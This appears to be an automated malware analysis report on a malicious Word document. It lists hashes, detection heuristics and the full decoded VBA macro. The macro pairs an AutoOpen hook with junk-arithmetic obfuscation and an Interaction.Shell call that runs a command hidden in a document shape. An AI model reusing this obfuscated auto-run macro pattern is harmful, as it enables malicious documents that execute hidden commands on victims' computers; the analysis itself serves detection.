Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 be111a7d801f656b…

MALICIOUS

Office (OLE)

108.8 KB Created: 2018-12-10 05:53:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 6198042e422778c367f340c0d5c3a3f1 SHA-1: 94d8daa7bffec27467a31bfce3c6af77e54b7ed2 SHA-256: be111a7d801f656b2c8ffdf7d9b56948ce5939877e4bc270c407b11f64e2adbc
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6779191-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6779191-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
Shell(MTQjztn, dzVrJs), kdRGJUz)
    ViwXjijvllVfKoz = uXkILDzoHqWwBhrkh / Tan(287653790) * 73483495 / Tan(39885120) + IzYJnOTWHWQqhIVPVv - Cos(116743102) + (243820755 / Int(PsMhuEukzSdtwmY))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
EzrTadlJ
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.iec.ch In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5684 bytes
SHA-256: 592dc7e679858eca9e92bd2207ba0a27812008a87a0724147143d5d72442077a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
159 of 189 identifiers look randomly generated (e.g. 'QQHGwILrauuTdVWziPUulmkD') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EYGjqwTRDW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
EzrTadlJ
End Sub

Attribute VB_Name = "fncRnMihOP"
Function EzrTadlJ()
On Error Resume Next
    NmmQZQOpliFSTcZtkSwZt = ZczozmNFKPGCiUZ / Tan(323866946) * 127556681 / Tan(128123572) + pYTqctLozHuzwsIMKQlScbj - Cos(132523628) + (271106235 / Int(QwETnzffDhFlWulz))
Set wQRKKVIPjiARNszBQ = NjdTvSQoaGYuqhfMhDXB
cwEGQiOppGkFRYN = iVztVuBrmrTmBKwdOWlnZ
    EPSYiifVKjkDqWrCTHD = kLRFUaYdACWiwojpkB / Tan(59963809) * 336445910 / Tan(319219107) + POQbXVmljzbrntwMEIF - Cos(18790460) + (137846925 / Int(KBFBmCSSwEWKwDp))
Set CDqPWYHHBqqXzAttEHDPWVi = SNwXUcwuWLFBLFlltzAvL
UzKdGpzaWhVHwIZkmYtwAmv = hwVSVYVmYYsBMrVHvwpYfEJ
    DojwmwlwKmHSzAIi = WlDuwdUKnwDmnkLaM / Tan(290559683) * 305450066 / Tan(102919769) + WCwwIkqofbmAcCGsOELP - Cos(250266800) + (337044417 / Int(hKXBvrmIOSkziGwptdWIXRlK))
Set FiznjAuXDOmliuwsSYirC = lQPSlPrcQZNTqJpVfRp
frMEKiZPEsDSjjwjYRPf = azMXPEnDztQCZstEKHCq
    htbLDrRmIuwMcE = hzhofSaShwwNGvzpAdZzKuO / Tan(223655486) * 185099133 / Tan(24693022) + IDDPidHHkOWXjHatPFdL - Cos(285339936) + (75749891 / Int(vjDHjmizMbqROih))
Set kwnMbdGppkBwcwslzw = fbWYVBPKvtpLOim
MDzdSdNRzlkWOjEUPXBrNaS = MSKwzYmPpEfhwUoC
    roEwfhqISzXcZKARFEBJt = GqumizrkAFwqLM / Tan(249531174) * 145239452 / Tan(111056747) + UCSblJarJkiBKv - Cos(271235897) + (264837383 / Int(NBszsRhwSjiwnfjozorki))
Set kLqnGCwvBBXiYUX = bklcTdssWEwNKG
DDIRhIFLiAWijbJHPQzMGzCl = TwRBEkluDTbPDqu
    fOzkowTTbKRoAFhjhhnJ = FKKJnqkzJGBsqG / Tan(117201737) * 122432425 / Tan(318755319) + JpTAJpvYPTsGChhfaEnaA - Cos(38108729) + (229935519 / Int(RDQvJwPQkzdUhEAUNP))
Set QEDETLLjNfViDGzjFZA = QDcVEDNzVDTNliSRO
wjzSClPOZOjVvuMAKMchzQwO = JMHzZojUFcQQwBrG
    iIRkMrIcCNTwRuMiDQRjtY = jaHtMpZPTFMKwR / Tan(21699033) * 140735682 / Tan(153702913) + quYNwGonmUikHvFIhK - Cos(32945449) + (330091455 / Int(mcwzqEjOQzuuJDicWiBFYDEj))
Set wRFqktQZZESaNFBEZWUnq = safKfDtYiXRQsndYfGiUjzMC
YzAwhktsAZiKZNM = BVuIwNOaBqOJVNsOdBHE
    sFbZKHqjzdWrOlqL = OYuJWGBHOXvAkJiiA / Tan(162763925) * 251580413 / Tan(237415864) + LBKXBpncLVXtqXfzC - Cos(150366331) + (336349825 / Int(SwjvfNUnINMEbwCWkmU))
Set NfCBXGtlClwBnJzPS = roUAUzJTSsUJMPBiN
tiXYTikXPKRSwmEVvjwNLE = EoARtYjzEwMWjqSUlPziwCz
Set GcwwLQN = EYGjqwTRDW.Shapes(izMuqEAWJ + "CswsovRTdNzin" + JnJaPk).TextFrame
    PVEfmazEpjCjqiCIFoflkQWt = JnumYsSNsfHFpUtLLZK / Tan(46497756) * 2650664 / Tan(311717309) + OlzwZGLwzLDdnFSRrjVwCv - Cos(17953573) + (103517333 / Int(laYrLmbOAfBawsGjhI))
Set lqGFtHTXizlSiicnjnGnZcP = aRqurPRVnIidfUfjsPzQPM
sUEZtaUVJbTfbRZfO = QfZDwILHWuKiwXNwwZnq
    ZHTdkjLirstMqjFBHczP = MOdrZRjHdidZSNkKLtPPVq / Tan(127731625) * 20192259 / Tan(151288058) + JzsZQojoNtqlKOfWOJ - Cos(104415501) + (257483864 / Int(TUqviizTVvaUCIjODSp))
Set dzrUZiAjzbJnjwpiCihFjUr = QQHGwILrauuTdVWziPUulmkD
CMZkjMJIsEJatlrPR = pEWBjHhXQzwNdfDo
    cjEDbMkPsHwSvSG = LMdvZYZzAOPuDEzLt / Tan(160739702) * 53682646 / Tan(340808874) + clzdTQXICcqwszOE - Cos(30431878) + (208346723 / Int(KGDNwpLnImZXKG))
Set ibdRGIBpzmYwKEk = psEpEZYDoHcOVdE
rnQnbnZvIRGaXsBjYfji = QAJCZcwfmUThtEX
MTQjztn = GcwwLQN.ContainingRange + nUBMpD + jikzhs + wNlDaK + vRcSzsY + MmjzvW + bawNY + bdUGF + cqXRXaAT + JDrcl + rhAwk
    wNzNtvmSViBjojGcN = zwsRYtmoRCiLUfRIPSpYOqH / Tan(10790314) * 124533773 / Tan(160834474) + RmkDzYdNZahpEaEiknJN - Cos(143418187) + (104151886 / Int(QompiGpqwzPUCjzhmrSr))
Set ickzJMWOJKHBGTOKjwHjj = ppGCzlFXWDXwiLBsVtSco
ISwNkWDsLIwwnvrHPlImnE = IkCJqdNRGuAhnGjAjTir
    wNdLnuzwoOotTQovGVO = mEAnitTXssJbjVYnbIidhQT / Tan(34505266) * 331177485 / Tan(126962599) + BPonfjumsMqdtbZGvFN - Cos(61475998) + (324773521 / Int(AUznlMWlvoOVSIDFduojjbl))
Set oBIJXzlJaIOUpsviQGRB = YIQCpcSUOMZiSzjDM
vDEuJtjPkwFSZJjR = trHhXSpMwplXtMfDt
    wpAviaaXFQKJSp = SkTjNaMltYjzKEriVtB / Tan(300753657) * 31002077 / Tan(283422203) + cTKjlGfEmJbdbdlf - Cos(190345331) + (235812318 / Int(HXwdQTNipQRvUb))
Set rQCubiOTuoiaPEjOYJ = jpdquMXYqnUNHB
mVciIZtDEpiswi = CtlUrhNaIhDFXfZ
    jPpptzbpMLONRIFBOJ = FapVEwjEMOcLaiKCzb / Tan(230636503) * 59158181 / Tan(93579938) + GGbUSVbaXpMhdtqtlrKsO - Cos(182049916) + (236438296 / Int(niHGFZfAFTUjtjjOclqmztAR))
Set FqrwVXiWchjOVVzK = bKYHzBKvPckzAthp
zinBkwpNRBwzHQtcnSqsEGo = DFutYboCYbVOWLqOjthA
    RHTVGPuYIjmrwNzwvkrrajbD = XzNGFLolFjYRDMuR / Tan(276085042) * 338453244 / Tan(134355676) + LsCmorHGlYlfPKjPjRDUwFr - Cos(196405310) + (165079641 / Int(rXzZkjHLwizbSOEhzjzs))
Set sdilYvztGBYNJz = IMoEYEMFSFzpQQGKjjcwu
oMkHRscZNIOUYmssUz = YLfZGjczqshjApoYcURm
Const dzVrJs = 0
    npQjHzvzvnTEzwVsi = ujiKDNjMHwCcAIoFJ / Tan(70262146) * 146376872 / Tan(146687310) + EpjMdWUdWKEVwZzndlC - Cos(323404895) + (308801056 / Int(wzSnLQtmLWMqpqzwZrOilo))
Set HEirRfZTZjOtitqLEkjwiJGj = pfLLiLEHAKjcZbH
DmJbzPEijJwCpPwzzlcANH = UKmiiHifIcMfWwIJaaciYN
    MMmEroVUcQNOkwOn = UGorhSukbwizuSJqPPPW / Tan(42951193) * 219437907 / Tan(341081196) + mUSopdPwoGIOaViusTQpmUiw - Cos(29319541) + (154440022 / Int(izQYmGrENAGvzimLnK))
Set QtlVimRJKRlUjSHjzXiVIjQ = tmYSHzJunJHczdmlV
jncjWcqBpoFpmhcUbrOzCKHr = ZLfjTkwzLCdoNQvbFKUo
lMlcnz = Array(YvwpQ, jWawip, djcArcB, Interaction _
. _
Shell(MTQjztn, dzVrJs), kdRGJUz)
    ViwXjijvllVfKoz = uXkILDzoHqWwBhrkh / Tan(287653790) * 73483495 / Tan(39885120) + IzYJnOTWHWQqhIVPVv - Cos(116743102) + (243820755 / Int(PsMhuEukzSdtwmY))
Set wYpiRAUGIUZVVMwt = OsHMcsKZmJDmzlWzDX
cGpPYGYZfZOlWkYitQ = WffEfqRTLjDXSoYQOYcjFDTf
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.